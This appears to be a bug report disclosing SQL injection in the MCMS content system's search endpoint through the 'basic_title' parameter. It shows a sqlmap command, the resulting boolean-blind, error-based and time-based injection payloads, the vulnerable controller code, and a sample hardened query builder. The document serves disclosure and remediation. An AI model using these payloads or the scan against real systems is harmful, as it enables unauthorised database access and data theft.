Use sqlmap to test:

```shell
python sqlmap.py -u http://localhost:8080/ms-mcms/cms/1/search.do --data basic_title=q --level 3
```

The result is:

```
sqlmap identified the following injection point(s) with a total of 385 HTTP(s) requests:
Parameter: basic_title (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: basic_title=q') AND 3749=(SELECT (CASE WHEN (3749=3749) THEN 3749 ELSE (SELECT 7782 UNION SELECT 6107) END))-- ZskZ

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: basic_title=q') AND EXTRACTVALUE(9263,CONCAT(0x5c,0x716b627871,(SELECT (ELT(9263=9263,1))),0x71786b7a71)) AND ('nLqp'='nLqp

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (comment)
    Payload: basic_title=q') OR SLEEP(5)#
```

Ask the author to fix this vulnerability. Thanks.
Where the SQL injection vulnerable code appears:

```java
@RequestMapping(value = "/{searchId}/search")
@ResponseBody
public void search(HttpServletRequest request, @PathVariable int searchId, HttpServletResponse response) {
    SearchEntity _search = new SearchEntity();
    _search.setAppId(BasicUtil.getAppId());
    _search.setSearchId(searchId);
    // Look up the matching search model
    SearchEntity search = (SearchEntity) searchBiz.getEntity(_search);
    // Check whether the current search has a template file
    if (ObjectUtil.isNull(search)) {
        this.outJson(response, false);
    }
    Map<String, Object> map = new HashMap<>();
    // Read the request fields (every request parameter, taken as-is)
    Map<String, String[]> field = request.getParameterMap();
    //TODO
    Map<String, String> basicField = getMapByProperties(net.mingsoft.mdiy.constant.Const.BASIC_FIELD);
    // Article field collection
    Map<String, Object> articleFieldName = new HashMap<String, Object>();
    // Custom field collection
    Map<String, String> diyFieldName = new HashMap<String, String>();
    // ... remainder of the method is not included in the report
}
```
The parameter 'basic_title' is not filtered and is user-controllable.

Payload:

HTTP request URL: http://localhost:8080/ms-mcms/cms/1/search.do
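For reference, one defensive pattern for the parameter handling described in this report, as an added example that is not MCMS project code: request parameter names from `getParameterMap()` are matched against an allowlist of known columns, and the values are bound as JDBC parameters instead of being concatenated into SQL. The class, the table name `cms_article`, the column list and the helper names are all assumptions for illustration.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.util.*;

/** Hypothetical hardened search builder (illustration only, not MCMS code). */
public class SafeArticleSearch {

    // Assumed allowlist: request field name -> real column name. Anything else is dropped.
    private static final Map<String, String> ALLOWED_FIELDS = Map.of(
            "basic_title", "basic_title",
            "basic_description", "basic_description");

    /**
     * Builds "SELECT ... WHERE 1=1 AND col LIKE ? ..." with one placeholder per accepted
     * field and collects the values to bind, in placeholder order, into boundValues.
     */
    static String buildSql(Map<String, String[]> params, List<String> boundValues) {
        StringBuilder sql = new StringBuilder(
                "SELECT basic_id, basic_title FROM cms_article WHERE 1=1");
        // TreeSet gives a deterministic column order regardless of request parameter order.
        for (String key : new TreeSet<>(params.keySet())) {
            String column = ALLOWED_FIELDS.get(key);   // null for any unknown field name
            String[] values = params.get(key);
            if (column == null || values == null || values.length == 0 || values[0].isEmpty()) {
                continue;
            }
            sql.append(" AND ").append(column).append(" LIKE ?");
            boundValues.add("%" + values[0] + "%");
        }
        return sql.toString();
    }

    /** Prepares the statement and binds every collected value as a parameter. */
    static PreparedStatement prepare(Connection conn, Map<String, String[]> params)
            throws SQLException {
        List<String> values = new ArrayList<>();
        PreparedStatement ps = conn.prepareStatement(buildSql(params, values));
        for (int i = 0; i < values.size(); i++) {
            ps.setString(i + 1, values.get(i));
        }
        return ps;
    }

    public static void main(String[] args) {
        // Constructed sample request: the time-based probe value from the sqlmap output above
        // as a field value, plus a parameter whose name is not an allowed column.
        Map<String, String[]> params = new HashMap<>();
        params.put("basic_title", new String[]{"q') OR SLEEP(5)#"});
        params.put("not_a_column", new String[]{"x"});
        List<String> bound = new ArrayList<>();
        System.out.println(buildSql(params, bound)); // only the allowlisted column appears
        System.out.println(bound);                   // the probe text is a bound value, not SQL
    }
}
```

Note that `%` and `_` inside a bound value still act as LIKE wildcards; escape them if exact substring matching matters.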